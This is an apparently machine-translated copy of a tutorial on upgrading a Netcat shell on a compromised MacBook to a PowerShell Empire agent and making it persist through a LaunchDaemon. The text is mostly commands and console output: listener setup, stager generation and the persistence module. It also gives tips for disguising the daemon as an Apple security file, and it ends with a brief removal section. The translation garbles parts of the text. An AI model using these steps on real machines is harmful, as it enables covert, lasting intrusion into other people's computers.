قالب وردپرس درنا توس
Home / Tips and Tricks / How to Install a Persistent Empire Backdoor on a MacBook «Null Byte :: WonderHowTo

How to Install a Persistent Empire Backdoor on a MacBook «Null Byte :: WonderHowTo



After backdoor access to a MacBook that is not protected by FileVault or uses a fake PDF document to gain remote access, an attacker might want to upgrade their Netcat shell to a more complete version. While a root shell allows attackers to remotely modify most files on the MacBook, Empire has some useful post-exploit modules that make hacking Macs very easy.

At this time, an attacker would have already received remote access to the target MacBook another Mac model computer. In my example, I'm building on an already established Netcat backdoor

  `/ tokyoneon ~
nc -l -p 1234
to listen [any] 1234 ...
xx.xx.x.xx xxxxxxxxx xxxx xxxxxx xxxxx: xxxxxxxx xxxxxx
connect with [xx.xx.x.xx) from (xxxxx) [xx.xx.x.xx] 50027
bash: no job control in this shell
bash-3.2 # _ 

To begin, Empire should be installed and configured on the attacker's system. If the destination MacBook is on a local network, installing Empire in Kali will do the trick. If the target is mobile and constantly moving between Wi-Fi networks, Empire must be installed on the attacker's virtual private server (VPS).

Do Not Miss: How to Connect to MacBook Backdoors [19659006] Step 1: Start the Empire Listener

Empire should be running with a listener listening for incoming connections from the destination MacBook waiting. In this example, I'm using an HTTP listener on port 8080. The following commands can be used to quickly set up an Empire listener.

  uselistener http
Set port 8080
Host 
execute 

This is what it should look like after you have executed the commands:

  (Empire)> listeners
[!] Currently no listeners are active
(Empire: listener)> uselistener http
(Empire: Listeners / http)> set port 8080
(Empire: Listener / http)> set host xx.xx.x.xx
(Empire: Listener / http)> execute
[*] Starting Listener "http"
* Serving Flask App "http" (lazy loading)
* Environment: Production
WARNING: Do not use the development server in a production environment.
Use a WSGI production server instead.
* Debug mode: off
[+] Handset started successfully!
(Empire: Listener / http)> Listener

[*] Active listeners:

Host delay / jitter of the name module
---- ------ ---- -----------
http http: //xx.xx.x.xx: 8080 5 / 0,0

(Empire: listeners)> _ 

Step 2: Generate the Stager

Next, create a launcher script with the osx / launcher holder. This can be done with the following commands:

  usestager osx / launcher
Set Listener http
generate 

The entire empire output should be copied and pasted into the Netcat terminal. In the example above, this would be the long line starting with "echo" at the bottom.

A New Agent Will Appear in the Empire Terminal Attackers Will Explode the MacBook

  (Empire: agents)> [*] PYTHON-Stage Stage 1) to xx.xx.x.xx
[*] Agent P98MAEE0 from xx.xx.x.xx has posted a valid Python PUB key
[*] The new agent P98MAEE0 has checked in
[+] Initial Agent P98MAEE0 of xx.xx.x.xx now active (Slack)
[*] Send agent (level 2) to P98MAEE0 at xx.xx.x.xx
[>] ...................

(Empire: Agents)> _ 

The attacker has a large number of post-exploitation modules available at this time. Stay tuned for future articles where I'll show you how to use Empire's most advanced analysis modules to further compromise the MacBook and its Wi-Fi networks.

Copying Empire Edition is easy enough for a hacker. You want to upgrade your shell to a more advanced framework such as Empire or Metasploit. But maintaining such a back door for a long time is a little trickier. The Python script, which is currently running as a background process, shuts down when the user logs off or the computer is turned off.

The following is a persistence engine that creates a new Empire Agent every time I restart the MacBook. 19659023] Step 3: Set Persistence with Empire

In the Empire terminal, use the command agents to display the newly created agent. Then use the command interact to start the compromised MacBook

  (Empire)> agents

[*] Active ingredients:

Name Long Internal IP machine name Username Process
---- ---- ----------- ------------ -------- -------
P98MAEEO xx.xx.x.xx xxxxx MacBook A * root / usr / bin / py

(Empire: Agents)> interact with P98MAEEO
(Empire: P98MAEEO)> _ 

The command info can be used to display the available module options

  (Empire)> interact with P98MAEEO
(Empire: P98MAEEO)> usemodule persistence / osx / launchdaemonexecutable
(Empire: Python / persistence / osx / launchdaemonexecutable)> About

options:

Name Required value Description
---- -------- ----- -----------
SafeChecks True True Switch. If you are looking for LittleSnitch or a SandBox, stop the staging process if the value is true. The default value is True.
DaemonLocation True The full path where the Empire Lau daemon is located.
DaemonName True com.proxy.initialize Name of the launch daemon to install. Name is also used for the PLIST file.
Agent True P98MAEE0 Agent on which to run the module.
Listener True Listener to use.
UserAgent False default User-agent string used for the deer, request (default, none or other).

(Empire: python / persistence / osx / launchdaemonexecutable)> 

This particular Empire module requires several options to be set before running on the target MacBook. The required options can be set with the following commands:

  set DaemonLocation / etc / empire_persistence
Set daemonName com.empire
set agent 
set listener  

This would look like this, in my example:

  (Empire: python / persistence / osx / launchdaemonexecutable)> set daemonLocation / etc / empire_persistence
(Empire: python / persistence / osx / launchdaemonexecutable)> set daemonname com.empire
(Empire: python / persistence / osx / launchdaemonexecutable)> set agent P98MAEE0
(Empire: python / persistence / osx / launchdaemonexecutable)> set Listener http
(Empire: python / persistence / osx / launchdaemonexecutable)> _ 
  • DaemonLocation is the full path to the executable empire file that executes when the MacBook restarts. For demonstration purposes I will use the directory / etc / and the file name empire_persistence. To avoid detection, the daemon can be created in a less obvious location.
  • The DaemonName (com.empire) is the name of the .plist configuration file and can be renamed to anything. For a more convincing file name, attackers can use com.applesecurity.plist. This .plist file is automatically stored in the / Library / LaunchDaemons / directory on the destination MacBook and should not be moved or modified. Startup daemons must be in this directory.
  • The agent and listener should also be set accordingly if it is not set automatically.

Use the execute command to embed the Empire backdoor into the MacBook. 19659003] execute

Below is what my example looks like. You may need to select Y on your keyboard if you are advised that the option is not opsec-safe.

  (Empire: python / persistence / osx / launchdaemonexecutable)> Run
[>] module is not opsec safe, run? [y/N] y
[*] P98MAEEO was instructed to execute TASK CMD WAIT
[*] Agent P98MAEEO has been tasked with task ID 1
[*] The P98MAEEO agent ran the python / persistence / osx / launchdaemonexecutable module
(Empire: Python / persistence / osx / launchdaemonexecutable)> [*] Agent P98MAEEO returned

[+] Persistence has been installed: /Library/LaunchDaemons/com.empire.plist

[+] The empire daemon was written in / etc / empire_persistence

[*] Valid results from xx.xx.x.xx

(Empire: python / persistence / osx / launchdaemonexecutable)> _ 

How to Protect Against Persistent Backdoors

While some antivirus software protects against such attacks, there is no way to be sure without some testing on a Mac perform. I will write what I will do later for an anti-virus bypass article. I will update my results here if they actually protect against lingering backdoors. Otherwise …

  tokyoneon: ~ root # cd / Library / LaunchDaemons /
tokyoneon: / Library / LaunchDaemons root # ls
com.apple.plist com.h4ck3r.plist
com.empire.plist com.netcat.plist
tokyoneon: / Library / LaunchDaemons root # sudo launchctl unloads com.h4ck3r.plist
tokyoneon: / Library / LaunchDaemons root # rm com.h4ck3r.plist
tokyoneon: / Library / LaunchDaemons root # 

Do not miss: Null Bytes Guides on Hacking macOS

Title image by Iliescu Victor / PEXELS; Screenshots of tokyoneon / zero byte

Source link